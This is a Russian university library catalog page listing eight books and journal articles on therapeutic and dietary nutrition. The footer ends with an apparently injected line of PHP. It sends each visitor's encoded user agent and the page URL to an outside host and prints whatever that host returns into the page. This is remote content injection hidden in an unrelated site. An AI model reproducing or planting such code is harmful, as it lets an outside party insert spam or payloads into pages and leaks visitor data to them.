Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

302 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Лечебное питание")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Лечение кожных болезней [Текст] : рук. для врачей / А. Л. Машкиллейсон [и др.] ; под ред. : А. Л. Машкиллейсона, 1990. - 560 с.
Держатели документа (Информация об экземплярах) 
2. 
Королев, Алексей Анатольевич. Гигиена питания : учебник для вузов по специальности 060104 "Медико-профилактическое дело" / А. А. Королев, 2008. - 528 с
Ключевые слова 
гигиена питания -- энергетическая ценность продуктов -- пищевая ценность продуктов -- биологическая ценность продуктов -- безопасность пищевых продуктов -- гигиенические требования к продуктам -- продукты растительного происхождения -- продукты животного происхождения -- консервированные продукты -- обогащенные продукты -- функциональные пищевые продукты -- биологически активные добавки к пище -- рациональный ежедневный набор продуктов -- питание и заболевания -- неинфекционные заболевания -- избыточная масса тела -- ожирение -- сахарный диабет -- сердечно-сосудистые заболевания -- онкологические заболевания -- остеопороз -- кариес -- пищевые аллергии -- инфекционные заболевания -- сальмонеллезы -- листериозы -- коли-инфекции -- вирусные гастроэнтериты -- пищевые отравления -- питание различных групп населения -- питание детей -- питание беременных -- питание кормящих -- питание пожилых людей -- диетическое питание -- лечебное питание -- госсанэпиднадзор -- государственный санитарно-эпидемиологический надзор

Изложены гигиенические основы питания человека, научно-практические аспекты теории рационального питания. Приведены критерии пищевой и биологической ценности и безопасности основных групп продуктов. Рассмотрена в расширенном аспекте проблема алиментарно-зависимых заболеваний. Вопросы государственного санитарно-эпидемиологического надзора освещены в соответствии с современными положениями в области контроля качества и безопасности пищевой продукции и питания в целом.

Для студентов высших медицинских учебных заведений. Может быть полезен аспирантам, ординаторам, интернам и врачам.

3. 
Общепит: бизнес и искусство. - Журнал, 2018г. № 5
Оглавление 
  • Щекина, Ю. Обед в Белорусском Полесье / Ю. Щекина. - с.13-17
    Кл. слова: общепит, белорусская кухня, национальные блюда
  • Ежевикина, Л. Тажин: чудо - горшочек / Л. Ежевикина. - с.18-21
    Кл. слова: общепит, кухонная утварь, дизайн
  • Рассолова, Е. А. Организация питания в центрах спортивной подготовки / Е. А. Рассолова, Ж. В. Новикова. - с.26-33
    Кл. слова: рацион питания, здоровый образ жизни, питание спортсменов
  • Кыльчик, Ю. Организация диетического питания при консультативно-оздоровительных центрах / Ю. Кыльчик, Ж. В. Новикова. - с.30-33. - Библиогр. в конце ст.
    Кл. слова: лечебное питание, перечень диет, здоровое питание
  • Агапова, Е. Е. Корпоративное питание в офисах - дело не только социально значимое / Е. Е. Агапова, О. А. Иванова, М. Э. Саитова. - с.34-38
    Кл. слова: маркетинг, собственная кухня, доставка обедов
  • Дубцов, Г. Г. Особенности развития общественного питания в городе Москве / Г. Г. Дубцов, К. А. Корешков, Д. В. Федченко. - с.39-42
    Кл. слова: условия развития, развитие отрасли, задачи
  • Лопырева, Е. С. Польза и опасность современных диет / Е. С. Лопырева, О. В. Беспалова. - с.58-62
    Кл. слова: диета Дюкана, реакция организма, исследование
Держатели документа (Информация об экземплярах) 
4. 
Мудрость веков [Текст] : (Древ. тадж. медицина о сохранении здоровья) / Сост.: В. А. Капранов, Р. М. Хашим; Пер. В. А. Капранова, 1984. - 284, [1] с.
Держатели документа (Информация об экземплярах) 
5. 
Уласевич, Марина Владимировна. Технология приготовления пищи [Текст] : Справ. пособие / М. В. Уласевич, 2000. - 398, [1] с.
Держатели документа (Информация об экземплярах) 
6. 
Костюченко, Альфред Львович. Энтеральное искусственное питание в интенсивной медицине [Текст] / А. Л. Костюченко, Э. Д. Костин, А. А. Курыгин, 1996. - 330 с.
Держатели документа (Информация об экземплярах) 
7. 
Маслов, Леонид Александрович. Кулинария [Текст] : Учеб. / Л. А. Маслов, 1957. - 295 с.
Держатели документа (Информация об экземплярах) 
8. 
Зинец, Игорь Иванович. Здоровье и диета [Текст] : 100 лечеб. рационов, 500 рецептов диет. блюд / И. И. Зинец, 1995. - 470 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3217 - 31.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.02 с.14 запросов, 0.84c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;